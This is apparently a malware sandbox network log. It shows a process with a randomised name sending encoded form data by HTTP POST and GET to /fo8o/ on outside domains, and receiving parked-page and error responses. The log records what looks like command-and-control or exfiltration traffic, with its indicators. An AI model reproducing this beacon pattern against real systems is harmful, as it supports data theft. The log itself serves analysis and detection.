wP=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo9wAJiLWLPegzI0msG/rR6OqQUcnBJ5CRP0o+tGeDq1a0IDVaRDmecJGi228hgIVAoKBLUmSVqwMy3IWvYSdpcTft0zuxImClCOPy5501TFXcHkDkrL8Ujg50K5E605Dme3QHxkKeQOu5jOE1H1KjWb2E0QqQ8hvG+NiQDZvb0EYeDOTQh/DCr9rQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	54844	85.159.66.93	80	5692	C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 13:01:37.522520065 CEST	1818	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.magmadokum.com Origin: http://www.magmadokum.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1243 Referer: http://www.magmadokum.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 77 50 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 31 77 42 37 71 4c 57 73 54 65 76 54 49 30 76 4d 47 2b 72 52 36 44 71 52 39 56 6e 42 46 70 43 58 4c 30 71 64 6c 47 66 78 4f 31 52 30 49 44 4a 71 52 43 37 4f 63 6d 47 69 6d 79 38 67 51 49 56 41 6f 4b 42 4e 77 6d 62 67 57 77 4f 79 33 4a 47 2f 59 6b 5a 70 64 32 66 74 38 6a 75 78 4e 54 43 52 2b 4f 4d 53 70 35 35 6a 2f 46 56 38 48 6d 45 6b 72 54 38 55 76 37 35 30 6e 56 45 36 42 55 44 68 75 33 54 6d 77 4d 61 75 45 6d 38 62 43 70 5a 30 37 78 4b 47 4b 50 33 48 63 32 76 79 34 44 69 45 2b 48 36 48 72 46 69 4b 68 63 65 63 72 2b 61 55 59 77 4c 51 2b 36 33 73 63 54 68 32 45 66 54 73 59 6e 4a 78 53 73 4c 30 69 71 70 58 30 78 33 4b 4d 30 58 4f 43 65 38 58 52 63 44 54 56 67 68 69 78 65 41 37 76 38 67 59 46 69 2f 38 6b 65 73 73 4b 79 65 65 31 45 4f 76 4e 38 51 4a 4e 66 55 44 47 4d 67 2b 65 39 79 31 73 68 51 39 75 73 4b 54 73 73 4a 67 76 2f 6d 64 62 70 2f 6f 43 74 33 6c 49 64 32 32 57 [TRUNCATED] Data Ascii: wP=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo1wB7qLWsTevTI0vMG+rR6DqR9VnBFpCXL0qdlGfxO1R0IDJqRC7OcmGimy8gQIVAoKBNwmbgWwOy3JG/YkZpd2ft8juxNTCR+OMSp55j/FV8HmEkrT8Uv750nVE6BUDhu3TmwMauEm8bCpZ07xKGKP3Hc2vy4DiE+H6HrFiKhcecr+aUYwLQ+63scTh2EfTsYnJxSsL0iqpX0x3KM0XOCe8XRcDTVghixeA7v8gYFi/8kessKyee1EOvN8QJNfUDGMg+e9y1shQ9usKTssJgv/mdbp/oCt3lId22W4Y81k5HtKy5x22frMsbOotkvbhi646rremCShbroDUjUgsu6c7CjYLkKtFzmpXRGl3Ld7CbiBmuRiduyNdov15vLDVfDEui7tum9E7v4e63VvBdeC6joDS6shuFcb4J0muXndGqjsZzyJG0j/SslrqRihzqqCgho0HnUlciGFL3NXW+tWURlL1cCc4BMrepvUxTDjwpBzNzFaksp+A5VwcSc4WFI+aihmIJlg7EJs13kpMWCJX/+WbKYHKY3+T3bfyzWCTNQ6wAp6JjvaTYaz8GYfdHyQLYRPt4nFYWS02B9Y4/UuwPjSa2+S/+ZUJD0mFwOFpd/UaVEJy20CWWfgfqDZG8R2dMvnd7PuTUZ3ZEAWwkcs/3cUC8BnIK285v2IuvaiBXs2Nm0BQDOzoF2Wr+zhje86nlyoq6dmx782qZxlxWS6cEPhIofgX/UmovvfAfGxbswiBlIgjbQv43FPeWUYFq2OSc32m0PpdkKGDck+WQeFIbtTpAirxB84paDGX+UuBvs9oRlfN9YpWWrobTkUJVhTJMasV72SHqy2faJPw51w05Pabcfu+eGDafkuFamYllEy8B+eLT7rDEvS7Bt+lKe5myvGzvhNHaHBkghkeegmadgtcGD+ga1ZMod+TpSmNwN8uWspb1vuWNNnalfk2Rc8EgMZu [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	54845	85.159.66.93	80	5692	C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 13:01:40.065392017 CEST	516	OUT	GET /fo8o/?wP=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjNWAySNtnq/EMXCTP7S4oEh8mb9sAZyquFiTVTuU6HpMKOeASrGw=&fPh4U=MJo4 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.magmadokum.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Aug 12, 2024 13:02:40.788630962 CEST	194	IN	HTTP/1.0 504 Gateway Time-out Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	54848	91.195.240.94	80	5692	C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 13:02:45.992328882 CEST	784	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.rssnewscast.com Origin: http://www.rssnewscast.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 207 Referer: http://www.rssnewscast.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 77 50 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 57 2f 30 4f 35 68 55 50 58 53 72 57 2b 48 41 41 67 71 54 52 6e 45 64 72 65 38 43 58 47 36 77 51 38 50 36 48 62 41 42 6c 4f 4c 58 79 36 76 68 69 4b 58 52 70 69 39 36 54 66 55 62 67 30 62 74 76 71 77 54 4c 6d 76 78 47 2b 35 30 31 68 58 36 4f 4d 6c 71 59 38 42 31 44 57 54 59 4b 41 6c 2f 30 49 45 41 66 6f 68 73 4c 30 56 6c 4a 66 58 39 55 41 2b 4d 6b 55 6c 31 54 53 70 31 59 54 43 7a 54 5a 7a 77 6c 33 62 53 4a 6b 45 46 73 6b 36 4b 5a 6b 37 44 38 70 38 39 4a 64 39 49 54 71 44 51 47 32 64 48 32 67 68 72 61 55 52 44 67 6b 56 55 4f 52 48 32 77 49 51 70 6c 30 4f 4b 65 34 35 36 50 Data Ascii: wP=81L18xe3ynKwW/0O5hUPXSrW+HAAgqTRnEdre8CXG6wQ8P6HbABlOLXy6vhiKXRpi96TfUbg0btvqwTLmvxG+501hX6OMlqY8B1DWTYKAl/0IEAfohsL0VlJfX9UA+MkUl1TSp1YTCzTZzwl3bSJkEFsk6KZk7D8p89Jd9ITqDQG2dH2ghraURDgkVUORH2wIQpl0OKe456P
Aug 12, 2024 13:02:46.832770109 CEST	707	IN	HTTP/1.1 405 Not Allowed date: Mon, 12 Aug 2024 11:02:46 GMT content-type: text/html content-length: 556 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	54849	91.195.240.94	80	5692	C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 13:02:48.603087902 CEST	808	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.rssnewscast.com Origin: http://www.rssnewscast.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 231 Referer: http://www.rssnewscast.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 77 50 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 67 51 38 74 69 48 61 42 42 6c 4c 4c 58 79 79 50 68 6e 4a 6e 52 69 69 39 2f 7a 66 57 66 67 30 61 4e 76 71 77 6a 4c 6d 65 78 48 2b 70 30 7a 34 48 36 49 55 46 71 59 38 42 31 44 57 54 6c 6c 41 6c 58 30 4c 33 49 66 70 41 73 4b 33 56 6c 4b 63 58 39 55 45 2b 4d 67 55 6c 30 47 53 6f 6f 7a 54 48 33 54 5a 33 30 6c 32 4b 53 4b 74 45 45 6e 37 4b 4c 50 73 35 69 53 67 64 78 49 55 4d 4d 45 38 67 59 42 33 72 47 73 38 53 72 35 47 42 6a 69 6b 58 4d 38 52 6e 32 61 4b 51 52 6c 6d 5a 47 35 33 4e 66 73 33 6c 50 63 61 46 6e 63 73 47 78 34 4f 35 64 41 2f 36 77 76 55 67 3d 3d Data Ascii: wP=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMgQ8tiHaBBlLLXyyPhnJnRii9/zfWfg0aNvqwjLmexH+p0z4H6IUFqY8B1DWTllAlX0L3IfpAsK3VlKcX9UE+MgUl0GSoozTH3TZ30l2KSKtEEn7KLPs5iSgdxIUMME8gYB3rGs8Sr5GBjikXM8Rn2aKQRlmZG53Nfs3lPcaFncsGx4O5dA/6wvUg==
Aug 12, 2024 13:02:49.244676113 CEST	707	IN	HTTP/1.1 405 Not Allowed date: Mon, 12 Aug 2024 11:02:49 GMT content-type: text/html content-length: 556 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	54850	91.195.240.94	80	5692	C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 13:02:51.158113003 CEST	1821	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.rssnewscast.com Origin: http://www.rssnewscast.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1243 Referer: http://www.rssnewscast.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 77 50 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 6f 51 38 34 2b 48 61 69 70 6c 4d 4c 58 79 74 2f 68 6d 4a 6e 52 46 69 39 48 2f 66 57 43 56 30 66 4a 76 73 52 44 4c 78 36 6c 48 31 70 30 7a 6c 58 36 4e 4d 6c 71 33 38 42 45 49 57 58 46 6c 41 6c 58 30 4c 32 34 66 73 68 73 4b 78 56 6c 4a 66 58 39 41 41 2b 4d 49 55 68 5a 39 53 6f 39 49 54 7a 44 54 61 58 6b 6c 31 34 71 4b 76 6b 45 6c 34 4b 4c 48 73 35 75 52 67 64 73 35 55 4d 34 75 38 69 45 42 31 63 4c 75 6d 77 6a 67 5a 67 33 54 38 58 6f 6d 56 6a 6d 6f 4b 79 67 56 33 62 54 52 31 66 6d 45 79 6a 50 6e 59 6b 47 6d 6b 41 4e 56 45 4f 68 4f 31 37 46 72 4f 37 79 4c 69 6c 5a 7a 4c 42 67 59 42 57 70 6b 47 69 6b 79 6e 4c 70 48 68 2f 79 2b 61 4a 62 59 31 5a 48 78 31 41 61 67 46 6b 4d 43 2f 78 36 39 56 2b 67 36 67 49 4a 52 42 2b 63 46 6e 7a 4f 31 73 77 61 33 61 77 57 72 65 58 66 5a 65 34 66 34 4f 67 4b 44 72 48 4f 74 64 6a 79 68 53 66 4d 69 69 72 70 62 46 6a 45 55 48 62 4d 64 47 38 51 [TRUNCATED] Data Ascii: wP=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMoQ84+HaiplMLXyt/hmJnRFi9H/fWCV0fJvsRDLx6lH1p0zlX6NMlq38BEIWXFlAlX0L24fshsKxVlJfX9AA+MIUhZ9So9ITzDTaXkl14qKvkEl4KLHs5uRgds5UM4u8iEB1cLumwjgZg3T8XomVjmoKygV3bTR1fmEyjPnYkGmkANVEOhO17FrO7yLilZzLBgYBWpkGikynLpHh/y+aJbY1ZHx1AagFkMC/x69V+g6gIJRB+cFnzO1swa3awWreXfZe4f4OgKDrHOtdjyhSfMiirpbFjEUHbMdG8QfHTNHSA7tyZbJWfktDUtH9Vl4Gtq8+Ux/87b5vyBZlZYyttEcaYKi5Hr/Xwb9YLa2Yei/i9KdGN+ekuKAs4DWiqxPCl4h2D2WoPC2Im4LogCU9lEEunC3sdeZQsmzQEnRbiKzvlwJNNZMxkvX/iVUERy7NOcDrGglvWoA//QUJEUrWPAY6bAMuMHldSMDP73WLT/pcef5/eW/phVo3fiAIBIROfcD9pck17f9HLmGF+97KsTXAUSztBb1dglkU5bNDcIl7v4KEW2ezPEtIRzZ1Zvr+Qw/CldBPqYVaiGAbSfwKEdVQBeyWPBT2HgRPcq+pzSZ6hUDvFvX2jyem3v45KFKbEmo+k7N7coOpbPeS9IU5yGQ9dOJkE+sjueUwnXVoxD4ADrgEf9O1w8kIe3k+csb6hu3H8aMIM9szpOhAPv5oN429yEancjxPR4b8FsR4zMEeZD1AjVw2ohXwyv92mSegKgAIr+Ing6DiEGhIs5gNTJZ5y8rfSHKYhPSbwts/AuiHka1aGruK0xGZNDf6subQ987NoQUggtQ0J0nbdgVp6LMofjRX6dZdO6n4Xziut9vo8m2lR3l8kBtheU1WEFXC1J60k/sILCq5v1cil9pn/9isZXUq61rkHNyID53h+JoEv2dtekja9jUQzXrR8gnSLE60bQif [TRUNCATED]
Aug 12, 2024 13:02:51.794361115 CEST	707	IN	HTTP/1.1 405 Not Allowed date: Mon, 12 Aug 2024 11:02:51 GMT content-type: text/html content-length: 556 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	54851	91.195.240.94	80	5692	C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 13:02:53.689719915 CEST	517	OUT	GET /fo8o/?wP=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNp7YHjVi2aBezyBUOenUja13YBEIShwN33HoHbXtrY+oqbh1getk=&fPh4U=MJo4 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.rssnewscast.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Aug 12, 2024 13:02:54.399998903 CEST	1236	IN	HTTP/1.1 200 OK date: Mon, 12 Aug 2024 11:02:54 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_UNA6AvCxtGKMTC3Dc/PAYNin6kjJg35Oa+/BoQl4HTs2XmA6XO9gnxN7Isx4y1DOZ96iYVpPMxSRm+AqPfIvFA== last-modified: Mon, 12 Aug 2024 11:02:54 GMT x-cache-miss-from: parking-697cf4f855-gnfz2 server: Parking/1.0 connection: close Data Raw: 32 45 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 55 4e 41 36 41 76 43 78 74 47 4b 4d 54 43 33 44 63 2f 50 41 59 4e 69 6e 36 6b 6a 4a 67 33 35 4f 61 2b 2f 42 6f 51 6c 34 48 54 73 32 58 6d 41 36 58 4f 39 67 6e 78 4e 37 49 73 78 34 79 31 44 4f 5a 39 36 69 59 56 70 50 4d 78 53 52 6d 2b 41 71 50 66 49 76 46 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 72 73 73 6e [TRUNCATED] Data Ascii: 2E2<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_UNA6AvCxtGKMTC3Dc/PAYNin6kjJg35Oa+/BoQl4HTs2XmA6XO9gnxN7Isx4y1DOZ96iYVpPMxSRm+AqPfIvFA==><head><meta charset="utf-8"><title>rssnewscast.com - rssnewscast Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="rssnewscast.com is your first and best source for all of the informati
Aug 12, 2024 13:02:54.400065899 CEST	1236	IN	Data Raw: 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 Data Ascii: on youre looking for. From general topics to more of what you would expect to find here, rssnewscast.com has it all. We hope you find what you are search1062ing for!"><link rel="icon" type="image/png" href="//img
Aug 12, 2024 13:02:54.400088072 CEST	1236	IN	Data Raw: 69 6e 65 2d 68 65 69 67 68 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 73 75 62 7b 62 6f 74 74 6f 6d 3a 2d 30 2e 32 35 65 6d 7d 73 75 70 7b 74 6f 70 3a Data Ascii: ine-height:0;position:relative;vertical-align:baseline}sub{bottom:-0.25em}sup{top:-0.5em}audio,video{display:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,se
Aug 12, 2024 13:02:54.400101900 CEST	1236	IN	Data Raw: 63 68 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 65 61 72 63 68 2d 64 65 63 6f 72 61 74 69 6f 6e 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 7d 3a 3a 2d 77 65 62 6b 69 74 2d 66 69 6c 65 2d 75 70 6c 6f 61 64 2d 62 75 74 74 6f Data Ascii: ch]::-webkit-search-decoration{-webkit-appearance:none}::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:
Aug 12, 2024 13:02:54.400115967 CEST	1236	IN	Data Raw: 6d 69 6e 2d 68 65 69 67 68 74 3a 38 32 30 70 78 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 7b 70 61 64 64 69 6e 67 3a 30 20 30 20 31 2e 36 65 6d 20 30 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 Data Ascii: min-height:820px}.two-tier-ads-list{padding:0 0 1.6em 0}.two-tier-ads-list__list-element{list-style:none;padding:10px 0 5px 0;display:inline-block}.two-tier-ads-list__list-element-image{content:url("//img.sedoparking.com/templates/images/bulle
